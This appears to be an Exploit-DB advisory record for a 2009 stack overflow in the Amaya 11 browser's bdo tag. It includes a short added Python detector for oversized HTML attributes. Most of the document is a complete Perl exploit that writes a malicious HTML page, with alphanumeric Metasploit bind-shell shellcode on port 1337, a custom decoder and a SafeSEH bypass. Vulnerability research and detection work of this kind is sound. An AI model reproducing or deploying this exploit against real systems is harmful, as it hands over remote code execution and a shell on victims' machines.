Vendor: Amaya
By: Rob Carter
CVSS: 9.3 (HIGH)
CWE: 119 (Stack Overflow)
Product Name: Amaya
Affected Version From: Amaya 11
Affected Version To: Amaya 11
Patch Exists: YES
Related CWE: N/A
CPE: a:w3c:amaya:11
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Vista SP1
Year: 2009

Amaya 11 bdo tag stack overflow

The Amaya 11 bdo tag stack overflow is a vulnerability that allows an attacker to execute arbitrary code on the target system. The exploit bypasses SafeSEH by jumping to a pop/pop/push/pop/ret sequence in one of the Amaya modules that has a constant base address in memory. It then returns to the stack, short-jumps over the overwritten SEH record, decodes the first 12 bytes of the shellcode and runs the repaired shellcode to bind a shell on port 1337.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
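As an added detection example (not part of the advisory or the exploit), the following Python checks HTML content for the two traits of the payload described above: an attribute value far longer than any legitimate bdo dir= value ("ltr" or "rtl") and bytes outside printable ASCII. The 256-character threshold and the constructed sample documents are assumptions for this example.

```python
from html.parser import HTMLParser

# Assumed threshold for this example: no legitimate attribute value in a
# normal document approaches this length; the payload above uses ~6900 bytes.
MAX_ATTR_LEN = 256


class OverlongAttrDetector(HTMLParser):
    """Collects (tag, attribute, reason) for attribute values that are
    implausibly long or contain non-printable bytes."""

    def __init__(self, max_len=MAX_ATTR_LEN):
        super().__init__(convert_charrefs=True)
        self.max_len = max_len
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:          # bare attribute such as <input disabled>
                continue
            reasons = []
            if len(value) > self.max_len:
                reasons.append(f"length {len(value)} > {self.max_len}")
            # Printable ASCII is 0x20..0x7e; anything else in an attribute
            # value is not what a markup author writes by hand.
            if any(not (0x20 <= ord(ch) < 0x7f) for ch in value):
                reasons.append("non-printable bytes in value")
            if reasons:
                self.findings.append((tag, name, "; ".join(reasons)))


def scan_html(document, max_len=MAX_ATTR_LEN):
    """Return a list of (tag, attribute, reason) tuples for suspicious attributes."""
    parser = OverlongAttrDetector(max_len)
    parser.feed(document)
    parser.close()
    return parser.findings


# Constructed samples: an ordinary bdo element, and one shaped like the
# advisory's payload (oversized dir= value with control bytes), no shellcode.
BENIGN = '<p><bdo dir="rtl">hello</bdo></p>'
SUSPICIOUS = '<bdo dir="' + 'A' * 7000 + '\x06\x41">pwnd!</bdo>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, scan_html(doc))
```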

Exploit-DB raw data:

#!/usr/bin/perl

#############################################
#
#   Amaya 11 bdo tag stack overflow
#
#   author: Rob Carter (cartrel@hotmail.com)
#
#   targets: windows vista sp1
#
#   modified the alpha-numeric shell-code
#   from metasploit since the first 12 bytes
#   didn't fall within the ASCII range of
#   0x01-0x7f. otherwise my payload would
#   have been corrupted on the stack. wrote
#   a 47-byte decoder to repair the shell-
#   code to its original state.
#
#   this exploit bypasses safeSEH by jumping
#   to a pop pop push pop ret sequence in
#   one of the amaya modules that has a
#   constant base address in memory. ret's
#   back to the stack, short jump over the
#   overwritten SEH, decodes the first 12
#   bytes of the shellcode and then runs
#   the repaired shellcode to bind a shell
#   on port 1337.
#
#   $ perl amaya_sploit.pl > pwn.html
#
#   the author is not responsible for any misuse of
#   this code. it is intended for educational
#   purposes only
#
#############################################

# win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
"\x7f\x01\x01\x7f\x03\x68\x78\x70\x6f\x6f\x3d\x37".
"\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x48".
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x38".
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x48".
"\x49\x48\x4e\x36\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x54\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36".
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x43\x4a\x46\x47\x37\x43\x47".
"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x45\x43\x35\x43\x55\x43\x54".
"\x43\x45\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x45\x30".
"\x49\x43\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x36\x46\x4a".
"\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x45\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d".
"\x42\x55\x46\x45\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x56\x4a\x36\x43\x56".
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x32".
"\x43\x49\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x35\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$decoder =
"\x5b".			# pop ebx
"\x5b".			# pop ebx
"\x68\x6c\x02\x58\x6c".	# push 0x6c58026c
"\x58".			# pop eax
"\x01\x43\x38".		# add dword ptr[ebx+38],eax
"\x68\x01\x01\x01\x10".	# push 0x10010101
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f".	# push 0x7f7f7f01
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x11\x11\x01\x01".	# push 0x01011111
"\x58".			# pop eax
"\x01\x43\x40".		# add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11".	# push 0x11117f7f
"\x58".			# pop eax
"\x01\x43\x40";		# add dword ptr[ebx+40],eax

$payload =
"<bdo dir=\"".
"A" x 6905 .
"\x74\x06\x41\x41".
"\x51\x55\x03\x10".	# pop - pop - push - pop - ret 0c
$decoder.
"A".
$shellcode.
"\">pwnd!</bdo>";

print $payload;

# milw0rm.com [2009-02-04]